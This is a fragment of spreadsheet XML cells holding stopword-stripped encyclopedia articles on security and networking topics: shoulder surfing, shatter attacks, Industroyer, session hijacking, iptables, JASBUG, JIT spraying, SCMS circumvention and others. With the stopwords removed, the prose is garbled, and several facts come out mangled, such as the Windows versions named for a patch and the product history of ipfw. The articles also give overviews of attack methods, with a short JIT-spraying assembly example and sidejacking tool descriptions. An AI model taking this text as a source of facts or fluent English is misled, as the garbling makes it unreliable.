improved memorability. however, potential detriment advantage increased risk shoulder-surfing. graphical passwords graphics pictures passfaces, jiminy, vip, passpoints combination graphics audio avap likely subject increased risk unless somehow mitigated implementation. results indicate fact alphanumeric graphical password-based authentication mechanisms significant vulnerability shoulder-surfing unless certain precautions taken. despite common belief nondictionary passwords secure type password-based authentication, results demonstrate fact, vulnerable configuration shoulder-surfing. entry personal identification number short) used authenticate oneself various situations, withdrawing depositing money automatic teller machine, unlocking phone, door, laptop pda. though method authentication step verification process situations, vulnerable shoulder surfing attack. attacker obtain either directly looking victim's shoulder recording whole login process. items mobile phones glass, glossy screens, user could leave smudges screen, revealing pin. some highly advanced attacks thermal cameras thermal signature entered. thermal attacks take advantage heat fingerprints remaining keys authenticating person done entering secret. various shoulder surfing resistant entry methodologies used make authentication process secure. examples include pads covers protect privacy user, system implemented atms. another example used atms entry systems metal pads, making thermal camera attacks nearly impossible material, shielding, reflectivity internal heating. transfer heat wiping warm objects hands found effective counter thermal attacks experiments. countermeasure testing cognitive trapdoor game three groups involved machine verifier, human prover, human observer. goal group human prover input answering questions posed machine verifier observer attempts shoulder surf pin. countermeasures design harder easily usurp, easy observer remember whole login process unless observer recording device. also social engineering (security) information diving credit card fraud phishing references</t>
  </si>
  <si>
    <t>Shatter attack</t>
  </si>
  <si>
    <t>computing, shatter attack programming technique employed hackers microsoft windows operating systems bypass security restrictions processes session. shatter attack takes advantage design flaw windows's message-passing system whereby arbitrary code could injected running application service session, makes message loop. this could result privilege escalation exploit. overview shatter attacks became topic intense conversation security community august 2002 publication chris paget's paper titled, "exploiting design flaws win32 privilege escalation". paper, coined term "shatter attack", explained process application could execute arbitrary code another application. this could occur windows allows unprivileged applications send messages message loops higher-privileged application messages address callback function application's address space parameter. attacker manages string memory higher-privileged application (say pasting shellcode edit box) known location, could send wm_timer messages callback function parameters point attacker's string. weeks publication paper, microsoft responded, noting that: "the paper correct situation exists, correctly describe effect. where paper errs claiming flaw windows. reality, flaw lies specific, highly privileged service. design, services within interactive desktop peers, levy requests upon other. result, services interactive desktop effectively privileges commensurate highly privileged service there." solutions december 2002, microsoft issued patch windows 4.0, windows 2000, windows closed avenues exploitation. this partial solution, however, limited services included windows could exploited using technique; underlying design flaw still existed could still used target applications third-party services. with windows vista, microsoft aimed solve problem ways: first, local users longer session thus separating message loop logged-in user's session high-privilege system services, loaded session second, feature called user interface privilege isolation (uipi) introduced, whereby processes protected shatter attacks assigning integrity level process. attempts send messages process higher integrity level fail, even processes owned user. however, interactions processes different integrity levels prevented uipi. internet explorer example, uses uipi feature limit extent rendering components interact rest system. sessions instantiated redesigned windows vista windows server 2008 provide additional protection shatter attacks. local user logins moved session session thus separating user's processes system services could vulnerable. this creates backward compatibility issues, however, software designed assumption service running session logged-in user. support view, windows vista windows server 2008 introduced windows service called "interactive services detection" enables access dialogs created interactive services appear. interactive user shown dialog offered ability switch session access dialog box. this capability removed windows creators update. also user interface privilege isolation mandatory integrity control principle least privilege capability-based security references</t>
  </si>
  <si>
    <t>Industroyer</t>
  </si>
  <si>
    <t>industroyer (also referred crashoverride) malware framework considered used cyberattack ukraine’s power grid december 2016. attack fifth kyiv, capital, power hour considered large-scale test. kyiv incident second cyberattack ukraine's power grid years. first attack occurred december 2015. industroyer first ever known malware specifically designed attack electrical grids. time, fourth malware publicly revealed target industrial control systems, stuxnet, havex, blackenergy. discovery naming malware discovered slovak internet security company eset. eset cybersecurity companies detect name “industroyer”. cybersecurity firm dragos named malware “crashoverride”. 2022, russian hacker group sandworm initiated blackout ukraine using variant industroyer aptly dubbed industroyer2. description detailed analysis industroyer revealed malware designed disrupt working processes industrial control systems, specifically used electrical substations. industroyer modular malware; main components following: main backdoor used control components malware. connects remote command control servers order receive commands attackers. additional backdoor provides alternative persistence mechanism allows attackers regain access targeted network case main backdoor detected and/or disabled. launcher component separate executable responsible launching payload components data wiper component. launcher component contains specific activation time date; analyzed samples contained dates: december 2016 december 2016. (note: former date date attack actually went ahead.) four payload components target particular industrial communication protocols specified following standards: 60870-5-101, 60870-5-104, 61850, process control data access (opc data access). functionalities payload components include mapping network, issuing commands specific industrial control devices. data wiper component designed erase system-crucial registry keys overwrite files make system unbootable recovery attack harder. also control system security cyberwarfare december 2015 ukraine power grid cyberattack pipedream (toolkit) references further reading enisa "protecting industrial control systems. recommendations europe member states". december 2011. u.s. department homeland security "recommended practice: developing industrial control systems, cybersecurity incident response capability" (pdf). october 2009. andy greenberg june 2017). "how entire nation became russia's test cyberwar". wired.</t>
  </si>
  <si>
    <t>Infinite Disk</t>
  </si>
  <si>
    <t>infinite disk early hierarchical storage management (hsm) backup utility dos, microsoft windows, os/2 published chili pepper software atlanta 1992. infinite disk introduced hsm, previously limited mainframes, personal computers.the company software acquired cheyenne software 1995, turn purchased computer associates 1996.infinite disk, operating background, automatically compresses less-active files eventually migrates removable media, files remain visible windows folders and, accessed, fetched backup storage. variant infinite disk, personal archiver, bundled iomega removable drives starting november 1994. references</t>
  </si>
  <si>
    <t>Session hijacking</t>
  </si>
  <si>
    <t>computer science, session hijacking, sometimes also known cookie hijacking, exploitation valid computer session—sometimes also called session key—to gain unauthorized access information services computer system. particular, used refer theft magic cookie used authenticate user remote server. particular relevance developers, http cookies used maintain session many websites easily stolen attacker using intermediary computer access saved cookies victim's computer (see http cookie theft). after successfully stealing appropriate session cookies adversary might pass cookie technique perform session hijacking. cookie hijacking commonly used client authentication internet. modern browsers cookie protection mechanisms protect attacked.a popular method using source-routed packets. this allows attacker point network participate conversation encouraging packets pass machine. source-routing turned off, attacker "blind" hijacking, whereby guesses responses machines. thus, attacker send command, never response. however, common command would password allowing access elsewhere net. attacker also "inline" using sniffing program watch conversation. this known "man-in-the-middle attack". history http http protocol versions lacked cookies features necessary session hijacking. version 0.9beta mosaic netscape, released october 1994, supported cookies. early versions http security weaknesses relating session hijacking, difficult exploit vagaries early http servers browsers. http designated fallback http since early 2000s—and http servers essentially http servers session hijacking problem evolved nearly permanent security risk.the introduction supercookies features modernized http allowed hijacking problem become ongoing security problem. webserver browser state machine standardization contributed ongoing security problem. methods there four main methods used perpetrate session hijack. these are: session fixation, attacker sets user's session known them, example sending user email link contains particular session attacker wait user logs session side jacking, attacker uses packet sniffing read network traffic parties steal session cookie. many websites encryption login pages prevent attackers seeing password, encryption rest site authenticated. this allows attackers read network traffic intercept data submitted server pages viewed client. since data includes session cookie, allows impersonate victim, even password compromised. unsecured wi-fi hotspots particularly vulnerable, anyone sharing network generally able read traffic nodes access point. cross-site scripting, attacker tricks user's computer running code treated trustworthy appears belong server, allowing attacker obtain copy cookie perform operations. malware unwanted programs browser hijacking steal browser's cookie files without user's knowledge, perform actions (like installing android apps) without user's knowledge. attacker physical access simply attempt steal session example, obtaining file memory contents appropriate part either user's computer server.after successfully acquiring appropriate session cookies adversary might leverage pass cookie technique perform session hijacking. exploits firesheep october 2010, mozilla firefox extension called firesheep released, provided easy access point session hijackers attack users unencrypted public wi-fi. websites like facebook, twitter, user adds preferences allow firesheep user easily access private information cookies threaten public wi-fi user's personal property. only months later, facebook twitter responded offering (and later requiring) http secure throughout. whatsapp sniffer named whatsapp sniffer made available google play 2012. able display messages whatsapp users connected network user. time whatsapp used xmpp infrastructure encryption, plain-text communication. droidsheep droidsheep simple android tool session hijacking (sidejacking). listens http packets sent wireless (802.11) network connection extracts session packets order reuse them. droidsheep capture sessions using libpcap library supports: open (unencrypted) networks, encrypted networks, wpa/wpa2 encrypted networks (psk only). this software uses libpcap arpspoof. made available google play taken google. cookiecadger cookiecadger graphical java automates sidejacking replay http requests, help identify information leakage applications unencrypted requests. cross-platform open-source utility based wireshark suite monitor wired ethernet, insecure wi-fi, load packet capture file offline analysis. cookie cadger used highlight weaknesses youth team sharing sites shutterfly (used ayso soccer league) teamsnap. prevention methods prevent session hijacking include: encryption data traffic passed parties using ssl/tls; particular session (though ideally traffic entire session). this technique widely relied-upon web-based banks e-commerce services, completely prevents sniffing-style attacks. however, could still possible perform kind session hijack. response, scientists radboud university nijmegen proposed 2013 prevent session hijacking correlating application session ssl/tls credentials long random number string session key. this reduces risk attacker could simply guess valid session trial error brute force attacks. regenerating session successful login. this prevents session fixation attacker know session user logged some services make secondary checks identity user. instance, server could check request made address user matched last used session. this prevent attacks somebody shares address, however, could frustrating users whose address liable change browsing session. alternatively, services change value cookie every request. this dramatically reduces window attacker operate makes easy identify whether attack taken place, cause technical problems (for example, legitimate, closely timed requests client lead token check error server). users also wish websites whenever finished using them. however protect attacks firesheep. also arpon cross-site request forgery http cookie sequence prediction attack references</t>
  </si>
  <si>
    <t>Ipchains</t>
  </si>
  <si>
    <t>linux firewalling chains, normally called ipchains, free software control packet filter firewall capabilities series linux kernels. superseded ipfirewall (managed ipfwadm command), replaced iptables series. unlike iptables, ipchains stateless. rewrite linux's previous ipv4 firewall, ipfirewall. this newer ipchains required manage packet filter linux kernels starting version 2.1.102 (which development release). patches also available ipchains earlier series kernels. improvements include larger maxima packet counting, filtering fragmented packets wider range protocols, ability match packets based inverse rule.the ipchains suite also included shell scripts easier maintenance emulate behavior ipfwadm command. ipchains software superseded iptables system linux kernel above. references external links ipchains howto: tldp faqs.org</t>
  </si>
  <si>
    <t>Ipfirewall</t>
  </si>
  <si>
    <t>ipfirewall ipfw freebsd stateful firewall, packet filter traffic accounting facility. ruleset logic similar many packet filters except ipfilter. ipfw authored maintained freebsd volunteer staff members. syntax enables sophisticated filtering capabilities thus enables users satisfy advanced requirements. either used loadable kernel module incorporated kernel; loadable kernel module possible highly recommended. ipfw built-in firewall 10.7 lion 2011 replaced openbsd project's like freebsd, ipfw open source. used many freebsd-based firewall products, including m0n0wall freenas. port early version ipfw used since linux first implementation firewall available linux, replaced ipchains. modern port ipfw dummynet traffic shaper available linux (including prebuilt package openwrt) microsoft windows. wipfw windows port (2001) version ipfw. alternative user interfaces ipfw also netfilter/iptables, linux-based descendant ipchains npf, netbsd packet filter another widely deployed firewall solution references external links ipfw section freebsd handbook. dummynet project including versions linux, openwrt windows wipfw windows port (2001) version ipfw</t>
  </si>
  <si>
    <t>Ipsectrace</t>
  </si>
  <si>
    <t>ipsectrace software tool designed wayne schroeder help profile ipsec connections packet capture (pcp) file. program uses command line interface point capture informs user going somewhat inspired tcptrace, uses input files. ipsectrace available linux operating system. coded licensed gpl, effectively allowing anyone modify redistribute it.although main purpose monitor ipsec traffic, ipsectrace used crack extra layers security brought implementations security ipsec ssh, whereas programs anger, deceit, ettercap used infiltrate pptp security. references external links ipsectrace download ostatic</t>
  </si>
  <si>
    <t>Iptables</t>
  </si>
  <si>
    <t>iptables user-space utility program allows system administrator configure packet filter rules linux kernel firewall, implemented different netfilter modules. filters organized different tables, contain chains rules treat network traffic packets. different kernel modules programs currently used different protocols; iptables applies ipv4, ip6tables ipv6, arptables arp, ebtables ethernet frames. iptables requires elevated privileges operate must executed user root, otherwise fails function. linux systems, iptables installed /usr/sbin/iptables documented pages, opened using iptables installed. also found /sbin/iptables, since iptables like service rather "essential binary", preferred location remains /usr/sbin. term iptables also commonly used inclusively refer kernel-level components. x_tables name kernel module carrying shared code portion used four modules also provides used extensions; subsequently, xtables less used refer entire firewall (v4, arp, architecture. iptables superseded ipchains; successor iptables nftables, released january 2014 merged linux kernel mainline kernel version 3.13. overview iptables allows system administrator define tables containing chains rules treatment packets. each table associated different kind packet processing. packets processed sequentially traversing rules chains. rule chain cause goto jump another chain, repeated whatever level nesting desired. jump like “call”, i.e. point jumped remembered.) every network packet arriving leaving computer traverses least chain. origin packet determines chain traverses initially. there five predefined chains (mapping five available netfilter hooks), though table chains. predefined chains policy, example drop, applied packet reaches chain. system administrator create many chains desired. these chains policy; packet reaches chain returned chain called chain empty. prerouting: packets enter chain routing decision made. input: packet going locally delivered. anything processes opened socket; local delivery controlled "local-delivery" routing table: route show table local. forward: packets routed local delivery traverse chain. output: packets sent machine visiting chain. postrouting: routing decision made. packets enter chain handing hardware.a chain exist itself; belongs table. there three tables: nat, filter, mangle. unless preceded option iptables command concerns filter table default. example, command iptables shows chains rules, equivalent iptables filter show chains table nat, command iptables each rule chain contains specification packets matches. also contain target (used extensions) verdict (one built-in decisions). packet traverses chain, rule turn examined. rule match packet, packet passed next rule. rule match packet, rule takes action indicated target/verdict, result packet allowed continue along chain not. matches make large part rulesets, contain conditions packets tested for. these happen layer model, e.g. --mac-source --dport parameters, also protocol-independent matches, time. packet continues traverse chain either rule matches packet decides ultimate fate packet, example calling accept drop, module returning ultimate fate; rule calls return verdict, case processing returns calling chain; chain reached; traversal either continues parent chain return used), base chain policy, ultimate fate, used.targets also return verdict like accept (nat modules this) drop (e.g. reject module), also imply continue (e.g. module; continue internal name) continue next rule target/verdict specified all. userspace utilities front-ends there numerous third-party software applications iptables facilitate setting rules. front-ends textual graphical fashion allow users click-generate simple rulesets; scripts usually refer shell scripts (but scripting languages possible too) call iptables (the faster) iptables-restore predefined rules, rules expanded template help simple configuration file. linux distributions commonly employ latter scheme using templates. such template-based approach practically limited form rule generator, generators also exist standalone fashion, example, pages. such front-ends, generators scripts often limited built-in template systems templates offer substitution spots user-defined rules. also, generated rules generally optimized particular firewalling effect user wishes, likely increase maintenance cost developer. users reasonably understand iptables want ruleset optimized advised construct ruleset. other notable tools firehol shell script wrapping iptables easy-to-understand plain-text configuration file nufw authenticating firewall extension netfilter shorewall gateway/firewall configuration tool, making possible easier rules mapped iptables also nftables (firewall) (firewall) ipfirewall (ipfw) ipfilter ipchains uncomplicated firewall (firewall) references literature gregor purdy august 2004). linux iptables pocket reference: firewalls, accounting. o'reilly media, inc. isbn 978-1-4493-7898-1. external links netfilter/iptables project page "iptables". freecode. netfilter/iptables documentation page (outdated) detecting deceiving network scans countermeasures nmap iptables manpage syntax help iptables tutorial 1.2.2 oskar andreasson iptables: default linux firewall acceleration iptables linux packet filtering using gpgpu</t>
  </si>
  <si>
    <t>Iraqi block cipher</t>
  </si>
  <si>
    <t>cryptography, iraqi block cipher block cipher published source code form anonymous upload around july 1999, widely distributed usenet. five round unbalanced feistel cipher operating block key. source code shows algorithm operates blocks bytes bits). that's four times larger 3des bytes) twice twofish bytes). also shows size vary 2048 bits. comment suggests iraqi origin. however, like block cipher, generally regarded hoax, although lesser quality s-1. although comment suggests iraqi origin, comments, variable function names printed strings english rather arabic; code fairly inefficient (including pointless operations), cipher's security flawed proof). because constant schedule cipher vulnerable slide attack. however, take chosen texts create single slid pair, would make attack unfeasible. also many fixed points, although necessarily problem, except possibly hashing modes. public attack currently available. s-1, david wagner first spotted security flaws. references external links source code cipher file encryption mode source code iraqi block cipher mode source code microsoft visual mode compiled code (console application) mode source code iraqi block cipher mode source code microsoft visual mode compiled code (console application) mode</t>
  </si>
  <si>
    <t>Serviceability failure</t>
  </si>
  <si>
    <t>engineering, serviceability failure occurs structure collapse, rather fails meet required specifications. example, severe wind cause excess vibration pedestrian bridge making impossible cross safely comfortably. similar excessive vibrations caused pedestrians walking, running, jumping. similarly, storm conditions cause water spill coastal structure, boats safe behind structure. examples serviceability failures include: deformations vibration cracking leakages</t>
  </si>
  <si>
    <t>Service scan</t>
  </si>
  <si>
    <t>computer networks, service scan identifies services running list open ports. this closely tied port scanning tools (e.g. nmap, nessus) support both. service scan preferable referring port list, identify services running non-standard ports, common practice. service scanners work sending probe data port, monitoring response. example, sending "get probe could detect server, exact response give indication server. multiple probes sent identify less common services. nmap service scan captures information unidentified ports, users encouraged submit details these, included updates. almost vulnerability scanners built-in service scan. results service scan used determine tests port. also network enumerating port scan</t>
  </si>
  <si>
    <t>Isyvmon</t>
  </si>
  <si>
    <t>isyvmon computer system network monitoring software application system created it-cube systems. designed monitor track status various applications, network services, servers, network hardware. overview isyvmon based open source software nagios centreon licensed special features: monitoring hosts, networks, applications business processes ready-to-run distribution real-time exploitation management frontends web2.0 gui, dashboards, alerting, databases, reporting, administration prebuilt content inclusive templates plugins extended status-map integration extensions scalability single distributed deployment encrypted communication core satellites freeware edition limited hosts virtual hardware appliance, vmware ready history 2013 development 2012 (isyvmon v3.0) isyvmon „full discovery (anh)“ (freeware enterprise edition) enhancements isyvmon „simple discovery (adi)“ (freeware enterprise edition) more bugs fixed isyvmon monitoring (freeware enterprise edition) simplified setup esx(i) monitoring (freeware enterprise edition) improvements isyvmon worker (freeware enterprise edition) improvements commandline (freeware enterprise edition) simplified getting support isyvmon (freeware enterprise edition) tactical overview dashboard improvements (freeware enterprise edition) scheduled periodic downtimes available (freeware enterprise edition) secure ldap (tls) support (freeware enterprise edition) 2011 (isyvmon v2.4) auto discovery (adi) (also available freeware edition) advanced notification (ano) released (enterprise edition only) extended status (esm) v3.0 (also available freeware edition) android/iphone turns "technical preview" "beta" state 2011 (isyvmon v2.2) introduced connection splunk www.splunk.com) isyvmon introduced several features asked (sms, license gui, satellite gui, many more) many enhancements usability functionality based customer projects. focus even scalability stability. participated vmware ready process. 2010 (isyvmon v2.0) isyvmon's first world open public release. complete product website community based support (kb, forum, downloads, ...) introduced isyvmon standalone freeware edition. major focus scalability stability. integration many enhancements customer projects. based complete development framework. 2009 (isyvmon v1.5 v1.6) isyvmon's first official release. increased development steps integration features based customer needs. partnership merethis company behind centreon. opened distributed monitoring public version. integrated upgrade function isyvmon. 2008 (isyvmon v1.0) idea isyvmon born introduced based 2007 created standardized toolkit. increased development depending customer needs. started complete development framework based vmware toolkits. several projects major focus distributed monitoring. development upgrade function isyvmon. first virtual appliance version. 2007 (monitoring toolkit v0.1 v0.8) evaluated (relevant) available monitoring tools nagios interface handling unhandy starting centreon nagios. first versions standardized toolkit customers. first implementations standardized toolkit larger environments. also comparison network monitoring systems nagios references books schubert, al.; (2008) nagios enterprise network monitoring syngress isbn 978-1-59749-267-6 kocjan, wojciech; (2008) "learning nagios 3.0" packt publishing isbn 1-84719-518-0 external links centreon.com support sites isyvmon.com</t>
  </si>
  <si>
    <t>Service pack</t>
  </si>
  <si>
    <t>computing, service pack comprises collection updates, fixes, enhancements software program delivered form single installable package. companies often release service pack number individual patches given program reaches certain (arbitrary) limit, software release shown stabilized limited number remaining issues based users' feedback reports. large software applications office suites, operating systems, database software, network management, uncommon service pack issued within first year product's release. installing service pack easier less error-prone installing many individual patches, even updating multiple computers network, service packs common. service packs usually numbered, thus shortly referred sp1, sp2, etc. they also bring, besides fixes, entirely features, case windows (e.g. windows security center), heavily database dependent trainz 2009: world builder edition. incremental cumulative service packs microsoft windows cumulative windows this means problems fixed service pack also fixed later service packs. example, windows contains fixes included windows service pack (sp2). windows vista cumulative, however, incremental, requiring installed first.office office 2003, office 2007, office 2010 office 2013 service packs cumulative. impact installation additional software components application service packs replace existing files updated versions typically bugs close security holes. later time, additional components added software using original media, risk accidentally mixing older updated components. depending operating system deployment methods, necessary manually reinstall service pack change software. this was, example, necessary windows service packs; however, windows 2000 onwards, microsoft redirected setup programs updated service pack files instead files original installation media order prevent manual reinstalls. also adaptation update apple software update hotfix program temporary point release slipstream (computing) software release life cycle windows update references external links microsoft support lifecycle (includes microsoft's service pack policy) windows service packs list fixes included windows service pack</t>
  </si>
  <si>
    <t>JAD (software)</t>
  </si>
  <si>
    <t>(java decompiler) august 2011, unmaintained decompiler java programming language. provides command-line user interface extract source code class files. also java decompiler mocha references external links original site, including downloads wayback machine (archived february 2008) softpedia mirror</t>
  </si>
  <si>
    <t>JASBUG</t>
  </si>
  <si>
    <t>jasbug security disclosed february 2015 affecting core components microsoft windows operating system. vulnerability dated back 2000 affected supported editions windows server 2003, windows vista, windows server 2008, windows windows server 2008 windows windows server 2012, windows windows 8.1, windows server 2012 windows 8.1.the vulnerability allows hackers remotely take control windows devices connect active directory domain.jasbug registered common vulnerabilities exposures system cve-2015-0008. industrial control systems cyber emergency response team, part department homeland security, issued ics-alert-15-041-01, warning control systems owners expedite applying critical jasbug fixes. microsoft released patches, ms15-011 ms15-014, address jasbug vulnerability disclosed. these fixes took microsoft year develop deploy complexity jasbug vulnerability. time disclosure, million computers believed vulnerable exploit. history jasbug disclosed public microsoft part "patch tuesday," february 10th, 2015. background vulnerability initially reported microsoft january 2014 jeff schmidt, founder global advisors. after microsoft publicly announced security vulnerability, garnered name jasbug reference role global advisors played discovering exploit. discovery 2014, global advisors working engagement internet corporation assigned names numbers (icann), organization governing standards internet, research potential technical issues surrounding rollout generic level domains (gtlds) internet.while working research, global advisors, business partner simmachines, uncovered vulnerability applying "big data" analytical techniques large technical data sets. effect jasbug principally affects business government users. home users less likely affected jasbug domain-configured computers.white house cybersecurity advisor michael daniel spoke importance addressing jasbug meeting information security privacy advisory board national institute standards technology, office management budget department homeland security immediately took steps vulnerability federal networks.suzanne spaulding, serving under secretary national protection programs directorate (nppd) department homeland security, mentioned jasbug february 2015 house representatives hearing touched potential effect funding hiatus.in aftermath jasbug, various government agencies updated technical specifications mitigate exploit risks. example, united states department veteran affairs decided 2015 "unapprove" windows server 2003 based jasbug risks. exploitation according microsoft, exploit takes advantage group policy receives applies policy data domain-joined system connects domain controller. likely exploitation flaw involves deceiving user domain-configured system network controlled hacker.despite potential effect, indication jasbug vulnerability ever used cyberhackers access corporate government computers. specific systems affected jasbug affects windows vista, windows server 2008, windows windows server 2008 windows windows 8.1, windows server 2012, windows server 2012 windows windows 8.1. windows server 2003 also affected, jasbug patch platform, microsoft indicated feasible build version. jasbug also affects windows windows 2000, patch made available operating systems longer supported microsoft. bugfix deployment unlike high-profile vulnerabilities like heartbleed, shellshock, gotofail poodle, jasbug design problem, implementation problem, making type vulnerability unusual much difficult fix. required microsoft re-engineer core components operating system several features, including additional hardening group policy, feature organizations centrally manage windows systems, applications, user settings active directory environments.microsoft able jasbug flaw windows server 2003 systems, noting "the architecture properly support provided update exist windows server 2003 systems, making infeasible build windows server 2003."for unpatched unpatchable platforms vulnerable jasbug, security firms like symantec recommend organizations intrusion prevention systems (ips) monitor network activity possible malicious jasbug traffic. references</t>
  </si>
  <si>
    <t>JIT spraying</t>
  </si>
  <si>
    <t>spraying class computer security exploit circumvents protection address space layout randomization (aslr) data execution prevention (dep) exploiting behavior just-in-time compilation. used exploit format adobe flash.a just-in-time compiler (jit) definition produces code data. since purpose produce executable data, compiler types programs no-executable-data environment. because this, compilers normally exempt data execution prevention. spray attack heap spraying generated code. produce exploit code jit, idea dion blazakis used. input program, usually javascript actionscript, typically contains numerous constant values erroneously executed code. example, operation could used: transform bytecode native code like: $0x11223344,%eax eax,0x11223344 $0x44332211,%eax eax,0x44332211 $0x44332211,%eax eax,0x44332211 attacker uses suitable redirect code execution newly generated code. example, buffer overflow free could allow attack modify function pointer return address. this causes execute instructions unintended authors. attacker usually even limited expected instruction boundaries; possible jump middle intended instruction interpret something else. non-jit attacks, enough operations usefully take control computer. continuing example, jumping second byte "mov" instruction results "inc" instruction: %esp (%edx),%esp esp,dword [edx] %esi,0x44332211 dword ds:0x44332211,esi $0x44332211,%eax eax,0x44332211 computer hardware allows jumping middle instruction includes x86, x86-64, arm. although especially effective type hardware, spraying works systems well. protect spraying, code disabled made less predictable attacker. references</t>
  </si>
  <si>
    <t>Server farm</t>
  </si>
  <si>
    <t>server farm server cluster collection computer servers, usually maintained organization supply server functionality beyond capability single machine. they often consist thousands computers require large amount power keep cool. optimum performance level, server farm enormous costs, financial environmental. they often include backup servers take functions primary servers fail. server farms typically collocated network switches and/or routers enable communication different parts cluster cluster's users. server farmers typically mount computers, routers, power supplies related electronics 19-inch racks server room data center. applications server farms commonly used cluster computing. many modern supercomputers comprise giant server farms high-speed processors connected either gigabit ethernet custom interconnects infiniband myrinet. hosting common server farm; system sometimes collectively referred farm. other uses server farms include scientific simulations (such computational fluid dynamics) rendering computer generated imagery (see render farm).server farms increasingly used instead addition mainframe computers large enterprises. large server farms, failure individual machine commonplace event: large server farms provide redundancy, automatic failover, rapid reconfiguration server cluster. performance performance largest server farms (thousands processors typically limited performance data center's cooling systems total electricity cost rather processors' performance. computers server farms 24/7 consume large amounts electricity. reason, critical design parameter large continuous systems tends performance watt rather cost peak performance (peak performance (unit initial cost)). also, high availability systems must 24/7 (unlike supercomputers power-cycled demand, also tend much higher utilizations), attention power-saving features variable clock-speed ability turn computer parts, processor parts, entire computers (wol virtualization) according demand without bringing services. network connecting servers server farm also essential factor overall performance, especially running applications process massive volumes data. performance watt eembc energybench, specpower, transaction processing performance council tpc-energy benchmarks designed predict performance watt server farm. power used rack equipment measured power distribution unit. some servers include power tracking hardware people running server farm measure power used server. power used entire server farm reported terms power usage effectiveness data center infrastructure efficiency. according estimates, every watts spent running servers, roughly another watts needed cool them. reason, siting server farm important processor selection achieving power efficiency. iceland, cold climate year well cheap carbon-neutral geothermal electricity supply, building first major server farm hosting site. fibre optic cables laid iceland north america europe enable companies locate servers iceland. other countries favorable conditions, canada, finland, sweden switzerland, trying attract cloud computing data centers. countries, heat servers cheaply vented used help heat buildings, thus reducing energy consumption conventional heaters. also references</t>
  </si>
  <si>
    <t>Serial Copy Management System</t>
  </si>
  <si>
    <t>serial copy management system (scms) copy protection scheme created response digital audio tape (dat) invention, order prevent recorders making second-generation serial copies. scms sets "copy" copies, prevents anyone making copies first copies. not, however, limit number first-generation copies made master. scms also included consumer cd-r, minidisc digital compact cassette (dcc) players recorders. with demise formats, scms widespread use. however, concept scms resurrected broadcast flag, measure formerly mandated federal communications commission (fcc) limit copying digital signals. scms flags also included specifications, though known decoder player honors them. personal computers required include scms history scms created compromise electronics manufacturers, mainly sony philips, wanted make machines available united states, riaa, previously hampered availability machines threat lawsuits. riaa want low-cost digital recorders readily available, since felt technology would result widespread piracy. these lawsuit threats resulted chilling effect, prevented decks becoming readily affordable. 1987, member riaa proposed system recorders would copy protection them. copy protection would look presence frequencies particular high-frequency band; audio present band, recorder would assume music question copy protected, would allow recording music. record companies would release music particular frequency band filtered out. would illegal manufacture machine presence audio frequency band; riaa lobbying congress make land. reaction proposed scheme negative. home recording rights coalition orchestrated letter writing campaign opposing scheme. editorials musician's home stereo magazines attacked scheme. proposed never made committee. even shot down, riaa still threatened anyone released affordable consumer recorder made recorder available. 1992, congress passed audio home recording act. law, blank digital media (including tapes music cd-rs) would taxed, money going riaa, copy protection scheme, scms, would enforced. blank analog media, cassette tapes, subject tax. scms compulsory digital media zero deterioration quality copy copy. scms universally disliked home musicians used decks record music; acronym pronounced derogatory term, "scums". technical details scms copy protection looks bits written subcode data digital link. there bits relevant: channel status subchannel "cp" indicating whether source signal copyrighted not: means copyrighted, means copyrighted channel status subchannel indicating whether source signal original medium (such audio prerecorded tape) "not determined". audio laser optical media, means original means "not determined"; digital sources values reversed.copying allowed source signal recording copyrighted, copyrighted original. source signal copyrighted recording, recorder must "not determined" plays copy, copy cannot copied digitally again. circumvention software design defects certain models consumer minidisc player allow scms defeated. professional-grade minidisc systems costing several thousand dollars scms disabled standard. professional recorders, including computer drives, scms disabled also record audio onto data cd-r discs. european electronic hobby magazine elektor published construction project 1990s. device, completed, designed inserted digital link scms enabled devices (the article designed around optical toslink interface, would easy adapt s/pdif coaxial link). circuit intercepted scms control bits, changed "cp" "not copyrighted" state. similar functionality often also included commercially available bitrate-converters, like behringer ultramatch. there another scms defeated, requires copying table contents blank disc already allows copying, recorded 'copy disallowed' disc. method laborious, suffers disadvantage track marks titles lost process. references petitcolas, fabien a.p.; anderson, ross kuhn, markus (14–17 april 1998). david aucsmith (ed.). "attacks copyright marking systems". lecture notes computer science. portland, oregon, usa. 1525: 218–238. citeseerx 10.1.1.21.4517. doi:10.1007/3-540-49380-8_16. isbn 3-540-65386-4. bahlmann, bruce; martz, christine, scms serial copy management system, retrieved october 2011</t>
  </si>
  <si>
    <t>Separation of protection and security</t>
  </si>
  <si>
    <t>computer sciences separation protection security design choice. wulf identified protection mechanism security policy, therefore making protection-security distinction particular case separation mechanism policy principle. many frameworks consider security controls varying types. example, protection mechanisms would considered technical controls, policy would considered administrative control. overview adoption distinction computer architecture, usually means protection provided fault tolerance mechanism hardware/firmware kernel, whereas operating system applications implement security policies. design, security policies rely therefore protection mechanisms additional cryptography techniques. major hardware approach security protection hierarchical protection domains. prominent example approach ring architecture "supervisor mode" "user mode"). such approach adopts policy already lower levels (hardware/firmware/kernel), restricting rest system rely therefore, choice distinguish protection security overall architecture design implies rejection hierarchical approach favour another one, capability-based addressing.examples models protection security separation include: access matrix, ucla data secure unix, take-grant filter. such separation found models like: high-water mark, bell–lapadula (original revisited), information flow, strong dependency constraints. also capability-based addressing computer security policy notes references houdek, soltis, hoffman, 1981. system/38 support capability-based addressing. proceedings international symposium computer architecture. acm/ieee, 341–348. intel corporation (2002) ia-32 architecture software developer’s manual, volume basic architecture carl landwehr formal models computer security volume issue (september 1981) swift, michael brian bershad, henry levy, improving reliability commodity operating systems, transactions computer systems (tocs), v.23 n.1, 77-110, february 2005 wulf, cohen; corwin; jones; levin; pierson; pollack (june 1974). "hydra: kernel multiprocessor operating system". communications acm. (6): 337–345. doi:10.1145/355616.364017. issn 0001-0782. s2cid 8011765.</t>
  </si>
  <si>
    <t>Jabberwacky</t>
  </si>
  <si>
